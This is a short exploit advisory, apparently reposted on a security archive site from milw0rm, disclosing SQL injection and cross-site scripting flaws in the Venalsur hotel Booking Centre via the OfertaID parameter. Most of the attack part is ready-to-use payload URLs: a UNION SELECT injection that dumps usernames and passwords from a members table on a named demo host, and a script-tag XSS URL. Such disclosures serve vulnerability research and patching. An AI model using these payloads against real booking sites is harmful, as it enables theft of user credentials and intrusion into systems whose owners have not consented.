Venalsur on-line Booking Centre (OfertaID) XSS/SQL Injection Vulns

2009.02.23
Credit: d3b4g
Risk: Medium
Local: Yes
Remote: Yes
CWE: CWE-79

Booking System for Hotels Group powered by Venalsur Bookingcenter XSS/SQL injetion vulnerability! ------------------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------------------ Author: d3b4g Greetz: str0ke,,Darkc0de.com,rez0rn,draconyx,godinlaw,hatebreeder And all my friends Site : www.bl4ck3nd.info Contact: bl4ckend[at]gmail[dot]com ------------------------------------------------------------------- ------------------------------------------------------------------- Dork: N/A ------------------------------------------------------------------- Affected software: ----------------- Application : Booking System for Hotels Group powered by Venalsur Bookingcenter URL : http://www.bookingcentre.eu =================================================================== Sql injection ============= Exploit: http://site.com/www_en/cadena_ofertas_ext.php?OfertaID= [sql] Demo : http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members/* ------------------------------------------------------------------------ Xss === Exploit:http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=<script>alert(40323.6285846991)</script> ========================================================================= Proud to be a maldivian :):) Happy new maldives [29.10.2008]

References:

http://www.milw0rm.com/exploits/6876


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top